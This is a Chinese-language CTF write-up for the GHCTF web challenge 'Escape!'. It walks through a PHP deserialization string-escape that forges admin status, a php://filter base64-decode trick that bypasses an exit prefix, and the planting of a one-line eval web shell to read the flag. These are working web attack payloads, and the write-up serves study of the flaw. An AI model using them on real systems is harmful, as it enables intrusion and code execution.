ctf-web:php反序列化逃逸 -- GHCTF Escape!

A5rZ2025-03-13 14:24

step 1 寻找利用点

随便注册一个进去,能写入文件

php 复制代码 
<?php  
ini_set('display_errors', 0);  
error_reporting(0);  
include "class.php";  
function checkSignedCookie($cookieName = 'user_token', $secretKey = 'fake_secretkey') {  
    // 获取 Cookie 内容  
    if (isset($_COOKIE[$cookieName])) {  
        $token = $_COOKIE[$cookieName];  
  
        // 解码并分割数据和签名  
        $decodedToken = base64_decode($token);  
        list($serializedData, $providedSignature) = explode('|', $decodedToken);  
  
        // 重新计算签名  
        $calculatedSignature = hash_hmac('sha256', $serializedData, $secretKey);  
  
        // 比较签名是否一致  
        if ($calculatedSignature === $providedSignature) {  
            // 签名验证通过,返回序列化的数据  
            return $serializedData;  // 反序列化数据  
        } else {  
            // 签名验证失败  
            return false;  
        }  
    }  
    return false;  // 如果没有 Cookie}  
  
// 示例:验证并读取 Cookie$userData = checkSignedCookie();  
if ($userData) {  
    #echo $userData;  
    $user=unserialize($userData);  
    #var_dump($user);  
    if($user->isadmin){  
        $tmp=file_get_contents("tmp/admin.html");  
  
        echo $tmp;  
  
        if($_POST['txt']) {  
            $content = '<?php exit; ?>';  
       $content .= $_POST['txt'];  
       file_put_contents($_POST['filename'], $content);  
        }  
    }  
    else{  
        $tmp=file_get_contents("tmp/admin.html");  
        echo $tmp;  
        if($_POST['txt']||$_POST['filename']){  
        echo "<h1>权限不足,写入失败<h1>";  
}  
    }  
} else {  
    echo 'token验证失败';  
}

step 2 寻找伪造admin的方法

漏洞点出现在这里

php 复制代码 
$User=login($SQL,$username,$password);  
  
$User_ser=waf(serialize($User));  
  
setSignedCookie($User_ser);  
  
header("Location: dashboard.php");
php 复制代码 
function waf($c)  
{  
    $lists=["flag","'","\\","sleep","and","||","&&","select","union"];  
    foreach($lists as $list){  
        $c=str_replace($list,"error",$c);  
    }  
    #echo $c;  
    return $c;  
}

waf会将序列化后的内容替换为error,这是一个test用户应该有的序列化后的字符串

复制代码 
O:4:"User":2:{s:8:"username";s:4:"test";s:7:"isadmin";b:0;}

但是如果有用户叫

复制代码 
";s:7:"isadmin";b:0;}

他序列化后的数据就是

复制代码 
O:4:"User":2:{s:8:"username";s:21:"";s:7:"isadmin";b:0;}";s:7:"isadmin";b:0;}

我们要伪造isadmin为1

复制代码 
";s:7:"isadmin";b:1;}

接下来利用'将一个字符变为五个,也就是多出四个字符,我们需要想办法对其齐s:21,但是21不能被4整除,我们还得配合其他字符

复制代码 
'''''flag";s:7:"isadmin";b:1;}

序列化后的内容会从

复制代码 
O:4:"User":2:{s:8:"username";s:30:"'''''flag";s:7:"isadmin";b:1;}";s:7:"isadmin";b:0;}

变成

复制代码 
O:4:"User":2:{s:8:"username";s:30:"errorerrorerrorerrorerrorerror";s:7:"isadmin";b:1;}";s:7:"isadmin";b:0;}

即可成功伪造admin

step 3 文件写入拿shell

使用伪协议filter写和base64解码特性卡掉后面的东西

复制代码 
<?php eval($_POST[123])?>

filename=php://filter/convert.base64-decode/resource=./shell.php&txt=aPD9waHAgZXZhbCgkX1BPU1RbMTIzXSk/Pg==

后端和<?php exit; ?>拼上就是

复制代码 
<?php exit; ?>aPD9waHAgZXZhbCgkX1BPU1RbMTIzXSk/Pg==

base64解码后是

复制代码 
¦^Æ+Z<?php eval($_POST[123])?>

然后post获取flag即可

复制代码 
123=system('cat /flag');
相关推荐
飞鸿踏雪(蓝屏选手)5 小时前
137 ≤ Chrome 主密钥获取研究
c++·chrome·windows·网络安全·逆向分析
ooseabiscuit6 小时前
Laravel 8.x核心特性深度解析
php·laravel
C2H5OH8 小时前
PortSwigger SQL注入LAB5 & LAB6
网络安全
сокол13 小时前
【网安-Web渗透测试-内网渗透】局域网ARP攻击与DNS劫持
服务器·网络·网络安全
pencek13 小时前
Hack-The-Box-Facts
网络安全
Inhand陈工16 小时前
城投公司地面与停车场监控改造实战:映翰通IR302 + GRE隧道实现RFID与视频数据远程汇聚
网络·人工智能·物联网·网络安全·智能路由器·信息与通信
求学中--17 小时前
鸿蒙网络请求从入门到精通:HttpURLConnection+第三方库,GET/POST/文件上传全覆盖
开发语言·php·harmonyos
yaodong51817 小时前
Gemini长上下文重塑RAG架构
开发语言·php
fengci.17 小时前
CTF+随机困难部分
android·开发语言·网络·安全·php
自不量力的A同学17 小时前
PHP 8.5.6 发布
开发语言·php
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04零基础教你claude code 接入 deepseek V405【AI】2026 年具身智能模型和世界模型总结06Windows端Codex接入第三方模型(DeekSeek,BaiLian)07Cursor 接入 DeepSeek‑V4‑Pro 完整指南(2026 实测)08codex app每次打开重连5次Reconnecting问题解决09要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法